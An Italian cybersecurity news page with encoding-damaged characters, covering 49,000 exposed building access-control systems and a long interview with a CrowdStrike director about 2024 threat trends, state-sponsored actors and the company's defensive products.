๐ฃ Dal 12 al 14 marzo 2025 si svolgerร lโottava edizione di Didacta Italia a Firenze, presso la Fortezza da Basso! Il #MIM sarร presente allโimportante appuntamento dedicato alla formazione e allโinnovazione scolastica con oltre 130 eventi, organizzatโฆ
Se pensavate che la cybersecurity riguardasse solo i dati digitali, ecco una realtร ben piรน inquietante: 49.000 sistemi di controllo accessi (AMS) sono stati trovati esposti online, senza protezioni adeguate, mettendo a rischio la sicurezza fisica di edifici governativi, infrastrutture critiche e aziende in tutto il mondo.
Unโesposizione pericolosa
Esempi di sistemi di controllo accessi. Immagine dal sito Modat Secondo i ricercatori di Modat, questi AMS gestiscono lโaccesso a strutture sensibili attraverso badge, sistemi biometrici e riconoscimento targhe. Tuttavia, le configurazioni errate di migliaia di dispositivi hanno lasciato le porte digitali spalancate, consentendo a chiunque di visualizzare e persino manipolare dati sensibili come:
Nomi, email e numeri di telefono degli impiegati
Dati biometrici come impronte digitali e riconoscimento facciale
Fotografie personali
Orari di lavoro e registri di accesso ai locali
E non รจ tutto: in alcuni casi, i ricercatori sono riusciti a modificare i record degli impiegati, creare utenti fittizi e alterare le credenziali di accesso, rendendo possibili scenari da film di spionaggio, in cui un attaccante potrebbe impedire lโingresso a personale autorizzato o, peggio, concederlo a intrusi.
Italia in prima fila nellโesposizione
Posizione dei dispositivi AMS esposti. Immagine dal sito Modat A livello globale, i numeri sono allarmanti, ma cโรจ un dato che fa riflettere ancora di piรน: il paese con il maggior numero di AMS esposti รจ lโItalia, con ben 16.678 dispositivi vulnerabili. Seguono il Messico (5.940) e il Vietnam (5.035), mentre negli Stati Uniti il numero si attesta a 1.966.
Danni oltre la sicurezza fisica
Oltre al rischio di intrusioni fisiche, lโaccesso a questi dati apre la porta a minacce informatiche di alto livello, come attacchi di spear-phishing e social engineering. Conoscere il nome di un dipendente, la sua email e il suo orario di lavoro consente ai cybercriminali di orchestrare attacchi mirati con unโefficacia devastante.
Come proteggersi?
Alcuni vendor hanno dichiarato di essere al lavoro con i clienti per mitigare il problema, ma la lentezza nelle risposte รจ preoccupante, considerando la gravitร della falla.
Le misure per arginare il problema esistono e dovrebbero essere adottate immediatamente:
Spegnere lโaccesso remoto: se il sistema non deve essere accessibile online, meglio rimuoverlo dalla rete pubblica.
Firewall e VPN: gli AMS devono essere dietro un firewall e accessibili solo tramite VPN sicure.
Cambio delle credenziali di default: sembra banale, ma molti sistemi sono ancora vulnerabili a brute-force perchรฉ usano username e password di fabbrica.
MFA e aggiornamenti: implementare lโautenticazione multi-fattore e installare gli aggiornamenti di sicurezza piรน recenti.
Crittografia e gestione dei dati: i dati biometrici e le informazioni personali devono essere sempre criptati, e i profili di ex-dipendenti devono essere cancellati per evitare usi fraudolenti.
Conclusione
Questa scoperta dei ricercatori di Modat evidenzia come la sicurezza fisica e informatica siano ormai inscindibili. Una vulnerabilitร nel mondo digitale puรฒ avere conseguenze devastanti nel mondo reale. Se le aziende e le istituzioni non prenderanno provvedimenti immediati, le conseguenze potrebbero essere disastrose. La domanda รจ: quanti altri sistemi critici sono esposti senza che nessuno se ne accorga?
Nel panorama odierno della sicurezza informatica, CrowdStrike si distingue come uno dei leader piรน innovativi e influenti. Fondata nel 2011 da George Kurtz, Dmitri Alperovitch e Gregg Marston, lโazienda ha rapidamente guadagnato una reputazione per la sua capacitร di rilevare e prevenire minacce informatiche avanzate. Con una combinazione di tecnologie allโavanguardia, intelligenza artificiale e un team di esperti di sicurezza, CrowdStrike รจ diventata una forza trainante nella protezione delle organizzazioni contro gli attacchi informatici.
In questa intervista a Luca Nilo Livrieri, Director, Sales Engineering Southern Europe di CrowdStrike, discuteremo delle sfide attuali che le aziende devono affrontare nel campo della sicurezza informatica e di come CrowdStrike sta rispondendo a queste minacce in continua evoluzione. Inoltre, parleremo del ruolo dellโintelligenza artificiale nella protezione dei dati e delle infrastrutture critiche.
La soluzione di maggior interesse fornita da CrowdStrike รจ la sua piattaforma Falcon, che utilizza una combinazione di analisi comportamentale e intelligenza artificiale per rilevare e rispondere alle minacce in tempo reale. Questa tecnologia ha rivoluzionato il modo in cui le aziende possono proteggere i loro sistemi, offrendo una visibilitร senza precedenti sulle attivitร sospette e consentendo una risposta rapida ed efficace.
Luca non mancherร di discutere delle tendenze future nel campo della sicurezza informatica e di come CrowdStrike si sta preparando per affrontare le nuove sfide che di giorno in giorno emergono. Con lโaumento della digitalizzazione e lโespansione delle superfici di attacco, la capacitร di adattarsi rapidamente e di innovare รจ cruciale per mantenere la sicurezza delle informazioni. Luca Nilo Livrieri, Director, Sales Engineering Southern Europe di CrowdStrike Accenneremo inoltre a come le attuali tensioni geopolitiche e conflitti globali, come gli scenari Ucraina/Russia, Cina/Taiwan stanno influenzando la natura e la frequenza degli attacchi cyber.
1-RHC: Il vostro Global Threat Report annuale (GTR 2025) riassume lโanalisi del team di intelligence di CrowdStrike effettuata nel corso del 2024 e descrive temi, tendenze ed eventi di rilievo nel panorama delle minacce informatiche. Questo report annuale include anche valutazioni anticipate delle minacce per aiutare le organizzazioni a prepararsi e a proteggersi durante il prossimo anno. Potrebbe condividere con noi alcune delle principali tendenze e minacce emerse dal report di questโanno e come le aziende possono utilizzare queste informazioni per migliorare la propria postura digitale per il futuro?
Luca Nilo Livrieri: Il report evidenzia alcune tendenze significative in relazione alle tipologie di attacchi: il 79% degli attacchi rilevati da CrowdStrike nel 2024 risulta aver operato senza malware, utilizzando cioรจ strumenti legittimi giร presenti nellโambiente della vittima, e rendendo quasi impossibile distinguere lโattivitร malevole. Si parla quindi di intrusioni interattive o โhands-onโ. Un dato altrettanto interessante emerso รจ lโaumento di attacchi che sfruttano tecniche di social engineering โ vishing e call back phishing su tutte. Tenendo conto di queste tendenze, le aziende devono focalizzarsi su diversi aspetti: innanzitutto su una protezione delle identitร , che vengono spesso usate dagli attaccanti come initial access, e poi su un rafforzamento delle soluzioni di rilevamento in real time basate su behaviour e, infine, sullโutilizzo di soluzioni di IA per aumentare la velocitร della detection, investigation e response. Dal punto di vista organizzativo รจ necessario formare il personale a difendersi dal social engineering, implementare workflow automatizzati di remediation e sviluppare capacitร di threat hinting a 360ยฐsu tutto il perimetro aziendale 2-RHC: Quali sono i trend nello eCrime? Quanto sono diffusi attacchi tramite malware rispetto ad attacchi mirati alle identitร che non prevedano lโutilizzo di malware e/o includano lโuso di social engineering potenziato eventualmente dallโIntelligenza Artificiale Generativa (GenAI) (come ad esempio con video DeepFake)?
Luca Nilo Livrieri: Secondo lโanalisi che abbiamo svolto nel 2024, come accennato nella risposta alla precedente domanda, vi รจ stata unโalta percentuale (79%) di attacchi senza utilizzo di malware e basati su tecniche โhands-on-keyboardโ e strumenti legittimi: si preferiscono quindi metodi โfilelessโ e living-off-the-land. Gli attacchi alle identitร risultano i piรน frequenti, essendo ormai da anni un trend in crescita. A tal proposito si รจ registrato, ad esempio, un aumento del 442% negli attacchi di vishing nella seconda metร del 2024 e un crescente utilizzo di GenAI per la creazione di contenuti piรน convincenti a supporto nelle operazioni di social engineering.
Lโutilizzo dellโintelligenza artificiale ha supportato unโevoluzione delle tattiche dal phishing tradizionale verso tecniche alternative (vishing e callback) con un aumento dellโefficacia significativo, se in passato la classica email di phishing aveva unโefficacia del 12%, oggi la stessa email generata con lโAI ha unโefficacia del 54%. 3-RHC: Kevin Mitnick, noto come โil Condorโ, รจ stato uno degli hacker piรน famosi e abili della storia. La sua carriera di hacking iniziรฒ negli anni โ80, quando si dedicรฒ al phreaking, ovvero lโhacking dei sistemi telefonici. Mitnick era un maestro nellโarte dellโingegneria sociale, utilizzando tecniche di manipolazione psicologica per ottenere informazioni riservate direttamente dalle persone al telefono.
Quanto รจ ancora importante per le organizzazioni educare gli utenti a riconoscere tentativi di attacco tramite di voice phishing (vishing)?
Luca Nilo Livrieri: Lโereditร delle tecniche di social engineering di Kevin Mitnick รจ piรน rilevante che mai nel panorama attuale delle minacce informatiche. Lโallarmante aumento negli attacchi di vishing (del 442%), giร citato, ha dimostrato come questa tecnica tradizionale si sia evoluta e rafforzata grazie alle nuove tecnologie.
Le tecniche di manipolazione psicologica che Mitnick utilizzava negli anni โ80 sono state potenziate dallโintelligenza artificiale e dalle tecnologie di clonazione vocale, rendendo gli attacchi di vishing significativamente piรน convincenti e difficili da identificare. Gli attaccanti moderni sfruttano ancora le stesse vulnerabilitร umane โ urgenza, autoritร e fiducia โ ma avendo a disposizione strumenti molto piรน sofisticati.
Lโevoluzione tecnologica ha permesso di automatizzare e scalare questi attacchi, integrandoli con altri vettori di minaccia. La capacitร di generare โvoci cloneโ realistiche e di orchestrare attacchi su larga scala rende senza dubbio il vishing una minaccia ancora piรน seria rispetto al passato. ร fondamentale per le organizzazioni proteggersi investendo nella formazione continua del personale, conducendo simulazioni realistiche e assicurando un aggiornamento costante della consapevolezza sulle nuove tecniche di attacco. Questa formazione deve essere supportata da solidi controlli tecnici, come lโautenticazione multi-fattore e protocolli di verifica delle richieste sensibili. Le organizzazioni devono inoltre stabilire procedure chiare e verificabili per la gestione delle richieste sensibili, definendo canali di comunicazione sicuri e implementando sistemi efficaci per il reporting di tentativi sospetti. La combinazione tra consapevolezza umana e controlli tecnici rimane la migliore difesa contro il vishing moderno, proprio come ai tempi di Mitnick, purchรฉ tenga conto della necessitร di strumenti e procedure specificamente adattati alle sfide contemporanee 4-RHC: Sempre in merito ai trend, pensando alle vittime dello eCrime, potrebbe indicarci delle statistiche riguardo i settori verticali piรน significativi nelle aree geografiche piรน importanti?
Luca Nilo Livrieri:Il Global Threat Report 2025 di CrowdStrike rivela un quadro complesso e preoccupante della distribuzione degli attacchi eCrime a livello globale e settoriale. Lโanalisi mostra come gli attori delle minacce abbiano intensificato significativamente le loro attivitร , con unโattenzione particolare al settore finanziario, che ha subito un drammatico aumento degli attacchi, specialmente da parte di gruppi legati alla Cina โ con incrementi che hanno raggiunto il 200-300%.
A livello globale il Nord America continua a essere un obiettivo primario, particolarmente per quanto riguarda le istituzioni finanziarie e le aziende tecnologiche. LโEuropa ha visto una concentrazione di attacchi diretti al settore manifatturiero e ai servizi finanziari, mentre nella regione Asia-Pacifico gli attaccanti hanno mostrato un interesse particolare per il settore industriale e manifatturiero.
Il settore sanitario e le infrastrutture critiche rimangono obiettivi di elevato interesse strategico a livello globale, con unโintensificazione degli attacchi particolarmente evidente nelle economie piรน sviluppate. 5-RHC: Oggi, la Cina รจ una delle principali economie mondiali, con un forte settore manifatturiero orientato allโesportazione. Qual รจ oggi la portata di operazioni di spionaggio informatico da parte di attori cinesi? La maturitร degli attaccanti cinesi รจ aumentata in modo proporzionato allโaumento del loro potere economico?
Luca Nilo Livrieri:Il Global Threat Report 2025 di CrowdStrike rivela un incremento sostanziale delle operazioni cyber cinesi, con un aumento complessivo del 150% trasversale su tutti i settori, con punte fino al 200-300% in ambiti strategicamente cruciali come il settore finanziario, mediatico, manifatturiero e ingegneristico-industriale. Questa escalation nelle attivitร di cyber-spionaggio riflette chiaramente lโambizione cinese di consolidare la propria posizione di leadership tecnologica e industriale a livello globale. La maturazione delle capacitร offensive cinesi รจ particolarmente evidente nellโevoluzione delle tattiche operative: gli attaccanti hanno abbandonato approcci piรน tradizionali e facilmente rilevabili in favore di metodologie piรน sofisticate e difficili da attribuire. Particolarmente significativa รจ la loro capacitร di condurre operazioni stealth che evitano lโuso di malware, a favore di tecniche piรน sottili che sfruttano le vulnerabilitร della supply chain e garantiscono una persistenza duratura nei sistemi compromessi. Questa evoluzione tecnica dimostra un chiaro allineamento con gli obiettivi strategici nazionali cinesi, come definiti nei piani quinquennali e nelle iniziative di sviluppo tecnologico del paese. La sofisticazione crescente degli attacchi cinesi rispecchia gli ingenti investimenti del paese in tecnologia e innovazione, creando una sinergia preoccupante tra potere economico e capacitร cyber offensive. Per le organizzazioni globali, specialmente quelle operanti in settori strategici o quelle per le quali la proprietร intellettuale risulta un asset particolarmente significativo, questa evoluzione rappresenta una sfida crescente che richiede un approccio difensivo sempre piรน sofisticato e stratificato.
La minaccia rappresentata dagli attori cinesi non รจ piรน solo una questione di sicurezza informatica, ma si inserisce in un piรน ampio contesto di competizione geopolitica e tecnologica globale, richiedendo una risposta coordinata che coinvolga sia aspetti tecnici che strategici.
6-RHC: Considerando che, in base al vostro report GTR 2025, almeno cinque diversi threat actors state-sponsored legati alla Cina, come ad esempio APT41 (a.k.a. Wicked PANDA), utilizzano ora il malware KEYPLUG anche offuscando le loro attivitร attraverso reti ORB (Operational Relay Box), quali sono le principali caratteristiche di questo malware che lo rendono cosรฌ versatile e resistente, e quali strategie possono adottare le organizzazioni per rilevare e mitigare tali minacce?
Luca Nilo Livrieri:KEYPLUG รจ un malware a bassa prevalenza, il che lo rende meno rilevabile rispetto ad altri malware piรน diffusi. Il suo impatto sul panorama delle minacce cyber รจ particolarmente significativo e ha contribuito a innalzare il livello generale di sofisticazione delle minacce. La sua condivisione tra diversi gruppi ha portato infatti a un continuo perfezionamento delle sue capacitร , che lโhanno reso sempre piรน efficace e difficile da rilevare. La natura collaborativa dello sviluppo di KEYPLUG tra diversi gruppi di minacce cinesi sottolinea la necessitร di un approccio alla sicurezza sempre piรน sofisticato e adattivo, capace di evolversi al passo con le crescenti capacitร degli attaccanti.
Tra le caratteristiche di questo malware si trova lโutilizzo di chiavi RC4 definite dagli attori per crittografare le comunicazioni di rete, rendendo piรน difficile lโintercettazione e lโanalisi del traffico. KEYPLUG utilizza server C2 con una durata mediana di 96 giorni, con variazioni significative tra i diversi gruppi di avversari, il che complica ulteriormente il tracciamento e la mitigazione. Per cifrare le comunicazioni tra i server C2 e i client, KEYPLUG utilizza certificati TLS auto-firmati, spesso con valori di campo predefiniti, per evitare il rilevamento. Tra le strategie che le organizzazioni possono adottare per rilevarne e mitigarne le minacce suggeriamo lโimplementazione di soluzioni di monitoraggio del traffico di rete per identificare comportamenti anomali e comunicazioni sospette con server C2 noti. ร consigliabile mantenere aggiornate le firme di rilevamento nei sistemi di sicurezza per includere gli indicatori di compromissione (IOC) associati a KEYPLUG, come gli indirizzi IP e i domini C2. Occorre verificare e analizzare i certificati TLS utilizzati nelle comunicazioni di rete per identificare quelli auto-firmati e sospetti. Eโ necessario anche implementare la segmentazione della rete per limitare i movimenti laterali degli attaccanti e contenere eventuali compromissioni e, infine, educare il personale sulla sicurezza informatica e sulle tecniche di phishing per ridurre il rischio di compromissioni iniziali.
7-RHC: Restando in tema geografico/geopolitico, nellโultimo decennio si รจ registrato un aumento delle attivitร criminali informatiche sponsorizzate dallo stato, (ad esempio il caso della violazione di SolarWinds, collegata alla Russia, che ha colpito la maggior parte dei governi e delle organizzazioni non governative statunitensi).Viste le recenti tensioni e conflitti (Cina/Taiwan, Russia/Ucraina, Israele/Hamas) il vostro team di cyber threat intelligence cosa ha osservato?
Luca Nilo Livrieri:Il panorama delle minacce cyber nel 2024 ha riflesso in modo significativo le crescenti tensioni geopolitiche globali, come evidenziato dal team di cyber threat intelligence di CrowdStrike. Lโanno ha visto unโintensificazione senza precedenti delle attivitร criminali informatiche sponsorizzate da stati nazionali, con Cina, Russia e Corea del Nord in prima linea.
Nel GTR 2025 abbiamo identificato 26 nuovi avversari, portando il totale degli attori mappati a 257. La Cina ha dimostrato una notevole evoluzione nelle sue capacitร offensive, registrando un incremento del 150% nelle attivitร di spionaggio informatico rispetto al 2023. (VEDI RISPOSTA 9 con dettaglio).
Sul fronte russo, le attivitร cyber sono state fortemente influenzate dal conflitto in Ucraina. Gli attori russi hanno mantenuto una presenza aggressiva nel cyberspazio, concentrandosi sulla raccolta di intelligence relativa allโUcraina e ai membri della NATO. Le loro operazioni hanno dimostrato una notevole capacitร di adattamento e di sviluppo di tecniche sempre piรน sofisticate.
La Corea del Nord ha invece mostrato un approccio distintivo, focalizzandosi principalmente sulla generazione di valuta attraverso operazioni cyber innovative. Il regime ha sviluppato schemi elaborati che includono frodi nel settore IT, utilizzando tattiche come interviste virtuali e โlaptop farmsโ. Questa strategia riflette il tentativo del paese di aggirare le sanzioni internazionali attraverso mezzi cyber.
Il quadro complessivo emerso nel report evidenzia come le tensioni geopolitiche si siano tradotte in unโescalation significativa delle attivitร cyber sponsorizzate dagli stati. Questi attori hanno dimostrato una crescente sofisticazione nelle loro operazioni, integrando perfettamente le attivitร cyber con piรน ampi obiettivi strategici e geopolitici. Tale evoluzione sottolinea lโimportanza crescente del dominio cyber come teatro di operazioni per il perseguimento di obiettivi statali, richiedendo un approccio sempre piรน sofisticato alla cybersecurity e una maggiore cooperazione internazionale nella risposta a queste minacce.
8-RHC: Riguardo la Corea del Nord, cosa avete osservato nei gruppi criminali che sono attivi per finanziare il regime di Pyongyang?
Luca Nilo Livrieri:Nel corso del 2024 il nostro team di cyber threat intelligence ha osservato che i gruppi criminali nordcoreani hanno continuato a focalizzarsi su operazioni informatiche atte a finanziare il regime di Pyongyang. Tra i principali elementi emersi dal nostro report cโรจ una innovazione nelle Operazioni di E-Crime: gruppi nordcoreani hanno innovato le loro operazioni di monetizzazione, utilizzando schemi di lavoro IT su larga scala in tutto il mondo.
ร emerso come gruppo particolarmente attivo FAMOUS CHOLLIMA (304 incidenti legati a FAMOUS CHOLLIMA tracciati da CrowdStrike nel 2024). Quasi il 40% di questi incidenti rappresentava operazioni di insider threat.
I gruppi nordcoreani hanno utilizzato tecniche di social engineering per supportare la creazione di profili LinkedIn falsi con testi generati da strumenti di intelligenza artificiale generativa (genAI) e hanno sfruttato lโAI per fornire risposte piรน credibili durante i colloqui di lavoro. Con queste tecniche รจ stato possibile ingannare i recruiter e farsi assumere allโinterno di grandi aziende come sviluppatori di software e tecnici IT. I โdipendentiโ si facevano spedire i laptop aziendali in dotazione presso โLaptop farmsโ in paesi specifici per ottenere un IP pubblico di provenienza โtrustedโ (es. USA) e, una volta ottenuto lโaccesso alle reti aziendali, installavano sui computer delle aziende strumenti di gestione remota (RMM) e estensioni del browser malevole per esfiltrare dati o eseguire altre attivitร malevole. 9-RHC: In base alle vostre indagini di intelligence, chi ha dominato nel 2024 il Threat Landscape a livello globale?
Luca Nilo Livrieri:Nel 2024 il panorama delle minacce cyber globali รจ stato caratterizzato da una predominanza significativa degli attori legati alla Cina, come giร evidenziato. Le operazioni di spionaggio informatico cinesi hanno raggiunto livelli di maturitร senza precedenti, registrando un incremento del 150% rispetto allโanno precedente. Questa escalation รจ stata accompagnata da un notevole perfezionamento delle capacitร operative e della gestione infrastrutturale, in particolare attraverso lโimplementazione sofisticata di reti di relay box operativi (ORB) per mascherare le loro attivitร .
Un aspetto particolarmente significativo del 2024 รจ stata lโidentificazione infatti di sette nuovi attori legati alla Cina. Questo rappresenta unโevoluzione strategica importante, segnando il passaggio da operazioni di tipo โsmash-and-grabโ a intrusioni piรน mirate e sofisticate, ciascuna con obiettivi specifici e ben definiti.
La risposta degli attori cinesi alle crescenti misure di contrasto implementate da governi, forze dellโordine e ricercatori di sicurezza, รจ stata notevole. Hanno intensificato lโuso di tecniche di offuscamento, sfruttando reti ORB e condividendo strumenti tra diversi gruppi, dimostrando una maggiore resilienza operativa e capacitร di mantenere lโanonimato.
Lโimpatto di queste operazioni si รจ fatto sentire in modo trasversale in tutti i settori a livello globale, con unโintensitร particolare in alcuni ambiti strategici. I settori dei servizi finanziari, mediatico, manifatturiero e ingegneria industriale hanno registrato aumenti drammatici nelle attivitร malevole, con incrementi che hanno raggiunto il 200-300% rispetto agli anni precedenti.
10-RHC: Diamo ora uno sguardo alla difesa, puรฒ spiegare come Falcon Adversary OverWatch, Falcon Next-Gen SIEM (crowdstrike.com/platform/next-โฆ) ed i Counter Adversary Playbooks possano aiutare nel creare programmi di monitoraggio/intelligence completi e personalizzati?
Luca Nilo Livrieri:La combinazione di Falcon Adversary OverWatch, Falcon Next-Gen SIEM e Counter Adversary Playbooks rappresenta un approccio integrato alla sicurezza che permette di creare programmi di monitoraggio e intelligence altamente efficaci e personalizzati. Falcon Adversary OverWatch fornisce un monitoraggio proattivo 24/7 delle attivitร sospette, con analisti esperti che valutano in tempo reale potenziali minacce. Questo servizio รจ particolarmente efficace nellโidentificare le tattiche hands-on-keyboard e le tecniche di living-off-the-land che, come evidenziato nel GTR 2025, rappresentano il 79% delle intrusioni rilevate.
La capacitร di OverWatch di distinguere tra attivitร legittime e malevole รจ cruciale, specialmente considerando la crescente sofisticazione degli attacchi. Falcon Next-Gen SIEM amplifica queste capacitร integrando e correlando dati da diverse fonti in unโunica piattaforma di gestione degli eventi di sicurezza. La soluzione sfrutta lโintelligenza artificiale e il machine learning per analizzare grandi volumi di dati, identificando pattern sospetti e anomalie che potrebbero indicare unโintrusione. La sua architettura cloud-native permette una scalabilitร e flessibilitร superiori rispetto ai SIEM tradizionali. I Counter Adversary Playbooks completano il quadro fornendo procedure operative standardizzate e best practice specifiche per contrastare determinate tipologie di attaccanti. Questi playbook, basati su anni di osservazione e analisi delle tattiche degli avversari, permettono di: anticipare le mosse degli attaccanti, implementare contromisure mirate, accelerare i tempi di risposta agli incidenti e standardizzare le procedure di risposta.
Lโintegrazione di questi tre elementi permette di creare un programma di sicurezza che non solo rileva e risponde alle minacce, ma le anticipa e le previene attivamente, adattandosi continuamente allโevoluzione del panorama delle minacce. La personalizzazione di questi strumenti consente inoltre di allineare le difese alle specifiche esigenze e rischi dellโorganizzazione, creando un sistema di protezione su misura e altamente efficace. 11-RHC: Quali sono i punti di forza del vostro prodotto Falcon Next-Gen SIEM? In cosa vi distinguete rispetto ai vostri competitor?
Luca Nilo Livrieri: Falcon Next-Gen SIEM si distingue nel mercato per diverse caratteristiche innovative e vantaggi competitivi significativi. La piattaforma si basa su unโarchitettura cloud-nativa che elimina la necessitร di infrastrutture on-premise complesse, offrendo scalabilitร immediata e costi operativi ridotti. Questa architettura moderna permette di processare e analizzare in tempo reale volumi di dati enormi, senza i limiti tradizionali dei SIEM legacy. Un punto di forza distintivo รจ lโintegrazione nativa con lโecosistema Falcon, che fornisce un contesto di threat intelligence immediato e accurato. Questo significa che ogni alert viene automaticamente arricchito con informazioni contestuali provenienti dal vasto database di minacce di CrowdStrike, permettendo una valutazione piรน rapida e precisa delle minacce.
La piattaforma eccelle nellโanalisi comportamentale, utilizzando algoritmi di machine learning avanzati per identificare anomalie e potenziali minacce. Questo approccio รจ particolarmente efficace nel rilevare attacchi sofisticati che potrebbero sfuggire ai sistemi tradizionali, come le tecniche โliving off the landโ e gli attacchi senza malware che, come evidenziato nel GTR 2025, rappresentano la maggioranza delle intrusioni moderne. Un altro elemento distintivo รจ la capacitร di fornire visibilitร completa attraverso diversi ambienti โ cloud, on-premise e ibridi โ con una singola console di gestione. Questo elimina i silos informativi e semplifica significativamente le operazioni di security.
La piattaforma include anche capacitร avanzate di automazione e orchestrazione, che permettono di rispondere rapidamente agli incidenti riducendo i tempi di risposta e il carico di lavoro manuale per i team di sicurezza. Infine, il modello di pricing trasparente e prevedibile, basato su sottoscrizione, elimina i costi nascosti tipici dei SIEM tradizionali legati allโingestione e alla conservazione dei dati. Queste caratteristiche, combinate con il supporto continuo del team CrowdStrike e lโaccesso a threat intelligence costantemente aggiornata, rendono Falcon Next-Gen SIEM una soluzione allโavanguardia nel panorama della sicurezza informatica.
12-RHC: Per quanto riguarda tattiche, tecniche e procedure (TTP) dei threat actors, in base al vostro monitoraggio durante il 2024, qual รจ stata la frequenza di attacchi attraverso lo sfruttamento vulnerabilitร consecutive (exploit chaining), con lโabuso di funzionalitร legittime (tecniche LOTL, Living Off The Land) o con Zero Days?
Vi sono possibili previsioni su questo per il 2025?
Luca Nilo Livrieri: Nel 2024 CrowdStrike ha osservato un aumento significativo nellโuso di tattiche, tecniche e procedure (TTP) avanzate da parte degli attori delle minacce, in particolare attraverso lo sfruttamento di vulnerabilitร consecutive (exploit chaining), lโabuso di funzionalitร legittime (tecniche LOTL, Living Off The Land) e lโuso di vulnerabilitร zero-day.
Per quanto riguarda lโExploit Chaining, gli attori delle minacce hanno frequentemente utilizzato catene di exploit per combinare piรน vulnerabilitร e ottenere esecuzione di codice remoto (RCE) non autenticata. Ad esempio, nel novembre 2024, sono stati osservati attori che hanno combinato una vulnerabilitร di bypass (CVE-2024-0012) con una vulnerabilitร di escalation dei privilegi (CVE-2024-9474) nel software PAN-OS di Palo Alto Networks. Questo approccio ha consentito agli attori di aumentare le proprie capacitร e lโimpatto sugli obiettivi.
Essi hanno continuato a sfruttare funzionalitร legittime (LOTL) dei sistemi per eseguire attacchi. Ad esempio, la funzionalitร xp_cmdshell di Microsoft SQL Server รจ stata abusata per ottenere RCE in vari prodotti.
Gli attaccanti hanno continuato a sfruttare, inoltre, vulnerabilitร zero-day per ottenere accesso iniziale e condurre attivitร malevole. Ad esempio, nel settembre 2024, un attore sconosciuto ha sfruttato una vulnerabilitร di divulgazione di file (CVE-2024-21287) per ottenere credenziali in chiaro e successivamente ha sfruttato una vulnerabilitร di deserializzazione (CVE-2024-20953) per compromettere i dispositivi.
CrowdStrike prevede che queste tattiche continueranno a essere prevalenti e si evolveranno ulteriormente nel 2025: lโexploit chaining, lโabuso di funzionalitร legittime e lo sfruttamento di zero-day continueranno a rappresentare una minaccia significativa, richiedendo alle organizzazioni di adottare misure proattive.
13-RHC: Lโabuso di account validi รจ diventato il principale vettore di accesso iniziale; le credenziali spesso vengono ottenute attraverso lโuso di information stealers o il social engineering.
Qual รจ lโimpatto di ciรฒ in attacchi a infrastrutture cloud aziendali?
Luca Nilo Livrieri: Lโabuso di account validi รจ emerso come vettore principale di accesso iniziale agli ambienti cloud aziendali, rappresentando una minaccia significativa per la sicurezza delle infrastrutture cloud moderne.
Secondo il GTR 2025 questa tendenza ha registrato un impatto particolarmente rilevante, con un 35% di incidenti cloud legati proprio allโabuso di credenziali legittime che si lega al dato relativo agli annunci pubblicitari di credenziali degli access broker che sono aumentati del 50% su base annua.
Gli attaccanti hanno perfezionato le loro strategie di acquisizione delle credenziali, utilizzando principalmente due approcci: lโimpiego di information stealers e di sofisticate tecniche di social engineering. Una volta ottenuto lโaccesso iniziale attraverso credenziali valide, gli attori delle minacce possono muoversi lateralmente nellโambiente cloud senza destare sospetti, sfruttando la legittimitร apparente delle loro azioni per eludere i sistemi di sicurezza tradizionali.
La persistenza negli ambienti compromessi viene spesso stabilita attraverso la registrazione di dispositivi per lโautenticazione MFA o la creazione di backdoor sofisticate. Ciรฒ permette agli attaccanti di mantenere lโaccesso anche dopo eventuali modifiche alle credenziali iniziali. Particolarmente preoccupante รจ la capacitร di questi attori di eludere le difese tradizionali, poichรฉ lโuso di credenziali legittime rende estremamente difficile distinguere le attivitร malevoli da quelle lecite.
SCATTERED SPIDER, ad esempio, ha dimostrato particolare abilitร nellโutilizzare account SSO compromessi per accedere a applicazioni critiche come SharePoint e Outlook, evidenziando la vulnerabilitร delle soluzioni SaaS a questo tipo di attacchi. Questa tendenza รจ destinata a intensificarsi nel 2025, in quanto ci si aspetta che gli attaccanti continueranno a perfezionare le loro tecniche di evasione e a concentrarsi sempre piรน su obiettivi SaaS e cloud.
Per contrastare questa minaccia crescente, le organizzazioni devono implementare misure di sicurezza avanzate che vadano oltre la semplice protezione perimetrale. ร essenziale adottare un approccio multilivello che includa il monitoraggio comportamentale, lโanalisi delle anomalie e sistemi robusti di gestione delle identitร e degli accessi. Solo attraverso una strategia di sicurezza completa e integrata sarร possibile mitigare efficacemente il rischio rappresentato dallโabuso di account validi negli ambienti cloud.
14-RHC: Ripensando agli attacchi in cui vengono sfruttate vulnerabilitร di tipo Zero Day, รจ possibile rimanere un passo avanti (o almeno allo stesso passo) rispetto alla intraprendente esuberanza e alle continue innovazioni della criminalitร digitale?Puรฒ lโattuale Intelligenza Artificiale Generativa (GenAI) essere di aiuto in questo?
Luca Nilo Livrieri:La sfida posta dalle vulnerabilitร Zero Day nel panorama attuale della cybersecurity rappresenta una delle problematiche piรน complesse da affrontare, come evidenziato dai dati del GTR 2025. La rapiditร con cui gli attaccanti riescono a sfruttare queste vulnerabilitร , con tempi di โbreakoutโ ridotti a una media di 48 minuti e picchi di efficienza di soli 51 secondi, impone un ripensamento radicale delle strategie difensive tradizionali.
LโIntelligenza Artificiale Generativa emerge come strumento potenzialmente rivoluzionario in questo contesto. La sua capacitร di analizzare pattern complessi, generare scenari predittivi, e automatizzare risposte in tempo reale offre certamente nuove possibilitร . Lโimplementazione di sistemi GenAI avanzati permette di sviluppare approcci proattivi alla sicurezza, anticipando potenziali vettori di attacco attraverso lโanalisi predittiva e la simulazione di scenari complessi.
Nel contesto specifico delle vulnerabilitร Zero Day, la GenAI dimostra particolare efficacia nellโanalisi del codice sorgente e nellโidentificazione di potenziali vulnerabilitร prima che possano essere sfruttate. La sua capacitร di processare e correlare enormi quantitร di dati in tempo reale permette di identificare anomalie comportamentali e pattern sospetti che potrebbero indicare lo sfruttamento di vulnerabilitร non ancora documentate. Tuttavia, รจ fondamentale riconoscere che la GenAI non rappresenta una soluzione definitiva, ma piuttosto un potente strumento da integrare in una strategia di sicurezza piรน ampia. Lโefficacia di questi sistemi dipende infatti dalla qualitร dei dati di addestramento e dalla loro continua ottimizzazione attraverso il feedback degli analisti di sicurezza. La componente umana rimane quindi essenziale, specialmente nellโinterpretazione contestuale delle minacce e nella definizione delle strategie di risposta.
La vera innovazione risiede nella sinergia tra expertise umana e capacitร computazionali della GenAI, sinergia che permette di sviluppare sistemi di difesa adattivi che possano evolversi rapidamente in risposta a nuove minacce, mantenendo al contempo la capacitร di discriminazione e il giudizio critico necessari per evitare falsi positivi e ottimizzare le risorse di sicurezza. Lโimplementazione di framework di sicurezza basati su GenAI richiede un approccio olistico che includa monitoraggio continuo, threat hunting proattivo e capacitร di risposta rapida agli incidenti. La formazione continua del personale di sicurezza nellโutilizzo efficace di questi strumenti diventa cruciale per massimizzare il potenziale.
